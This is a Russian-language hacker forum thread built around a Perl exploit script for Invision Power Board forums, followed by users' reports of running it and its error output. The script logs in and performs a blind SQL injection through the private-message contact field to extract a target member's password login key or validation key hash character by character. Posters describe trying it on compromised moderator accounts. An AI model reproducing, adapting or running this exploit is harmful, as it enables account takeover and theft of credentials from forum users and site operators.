работает отлично! Code: #!/usr/bin/perl use HTTP::Cookies; use LWP 5.64; use HTTP::Request; my $login_page = '?act=Login&CODE=01'; my $pm_page = '?act=Msg&CODE=04'; my $pose_pm_page = '?'; my $tries = 5; my $sql = ''; my $hash = ''; my $need_null = 0; my $i; my $j; my @charset = ('0' .. '9', 'a' .. 'f'); my %form = (act => 'Msg', CODE => '04', MODE => '01', OID => '', removeattachid => '', msg_title => 'asdf', bbmode => 'normal', ffont => 0, fsize => 0, fcolor => 0, LIST => ' LIST ', helpbox => 'Insert Monotype Text (alt + p)', tagcount => 0, Post => 'jkl'); my $ua = LWP::UserAgent->new; my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); my $resp; $ua->cookie_jar ($cj); push @{ $ua->requests_redirectable }, "POST"; print "+-------------------------------------------------------------------------+\n"; print "| IPB Validation Key & Pass Exploit |\n"; print "| |\n"; print "| |Exploit Found & Researched By 3l3ctr1c and Demmo |\n"; print "| |\n"; print "| |Possible Idea Given By SHAK |\n"; print "| |Perl Modification By ReZEN of xorcrew |\n"; print "| |\n"; print "| |\n"; print "| |\n"; print "| |\n"; print "| For Information On How To Use This Exploit Visit the Above given URL(s) |\n"; print "| |\n"; print "| |\n"; print "+-------------------------------------------------------------------------+\n"; print 'IPB Forum URL ? '; chomp (my $base_url = <STDIN>); print 'Your username ? '; chomp (my $user = <STDIN>); $form{entered_name} = $user; print 'Your pass ? '; chomp (my $pass = <STDIN>); print 'Target userid ? '; chomp (my $tid = <STDIN>); print "Type: ? \n 0. Password Hash \n 1. Validation Key Hash\n"; chomp (my $type = <STDIN>); if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' } do { $resp = $ua->post ($base_url . $login_page, [ UserName => $user, PassWord => $pass, CookieDate => 1, ]); } while ($tries-- && !$resp->is_success()); $tries = 5; if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" } if ($resp->content =~ /sorry, the password was wrong/i) { die "Error: password incorrect.\n"; } do { $resp = $ua->get ($base_url . $pm_page); } while ($tries-- && !$resp->is_success()); $tries = 5; if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" } if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#) { $form{post_key} = $1; } else { die "Error: couldn't get a post key.\n"; } if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#) { $form{auth_key} = $1; } $| = 1; print "\nAttempting to extract hash from database...\n "; OFFSET: for ($i = 0; $i < 32; ++$i) { CHAR: for ($j = 0; $j < @charset; ++$j) { $tries = 5; print "\x08", $charset[$j]; $vid = "vid"; if($type){ $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR(' . (join (',', map {ord} split ('', $user))) . ') FROM ' . 'ibf_validating WHERE member_id = ' . $tid . ' AND MID(' . 'vid, ' . ($i + 1) . ', 1) = CHAR(' . ord ($charset[$j]) . ')'; }else{ $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR(' . (join (',', map {ord} split ('', $user))) . ') FROM ' . 'ibf_members WHERE id = ' . $tid . ' AND MID(' . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR(' . ord ($charset[$j]) . ')'; } $form{from_contact} = $sql; $resp = $ua->post ($base_url . $post_pm_page, \%form, referer => $base_url . $pm_page); if (!$resp->is_success()) { die "\nError: " . $resp->status_line . "\n" if (!$tries); --$tries; redo; } if ($resp->content =~ /sql error/i) { if ($need_null) { die "Error: SQL error.\n".$resp->content ; } else { $need_null = 1; print $resp->content; redo OFFSET; } } elsif ($resp->content !~ /there is no such member/i) { print ' '; next OFFSET; } } die "\nError: couldn't get a char for offset $i\n"; } print "\x08 \x08\nHit enter to quit.\n"; <STDIN>; 1. Code: http://www.site.com/index.php?act=Reg&CODE=10 2. Code: IPB Validation Key & Pass Exploit 3. Code: http://www.site.com/index.php?act=Reg&CODE=lostpassform video нужнa ?
да нужна, вообще надо видео обновить, сделай пограмотнее и Задхлику объясни что его надо выложить поскорее.
Опять с ошибкой чтоли? У меня выдает вот это: Code: Attempting to extract hash from database... 0<html><head><title>IPS Driver Error</title> <style>P,BODY{ font-family:arial,sans-serif; font-size:11px; }</style></head><body> <br><br><blockquote><b>There appears to be an error wit h the database.</b><br> You can try to refresh the page by clicking <a href="javascri pt:window.location=window.location;">here</a>. <br><br><b>Error Returned</b><br> <form name='mysql'><textarea rows="15" cols="60">mySQL query error: SELECT name, members_display_name FROM ibf_members WHERE id=-1 UNION SELE CT CHAR(98,114,117,115,101,110,116) FROM ibf_members WHERE id = 2 AND MID(member _login_key, 1, 1) = CHAR(48) SQL error: The used SELECT statements have a different number of columns SQL error code: Date: Saturday 24th of June 2006 06:58:06 PM</textarea></form><br>We apologise f or any inconvenience</blockquote></body></html1
Скажи какого ласковое слово она мне это выдает? У тебя такое было? Где там ошибка в сплойте лень копатся HTML: Attempting to extract hash from database... f Error: couldn't get a char for offset 0 Или это, когда пытаюсь вырвать Validation Key
Версия форума Ipb 1.3 Final Не работает. проверял на 3х пользователях - себе любимом и 2х ломаных модерах. Результата нет. Выдает тоже, что и у Новы.
Кароче я разобрался банан это а не сплойт автор. Единственное на очом он у меня работал так это 2.0.3форум который у тебя там на видео на остальных версиях 2.0.1 , 1.3 , 2.1.1 и ещё куче он работать у меня отказался так что в печь сплойт. !
------------------------------------------------------------------------------------- Software Affected : Invision Power Board Versions Affected : Possibly IPB 2.1.5 and lower EDIT : Exploit Successfuly works with unpatched 2.1.5 version. Method : SQL Injection ------------------------------------------------------------------------------------
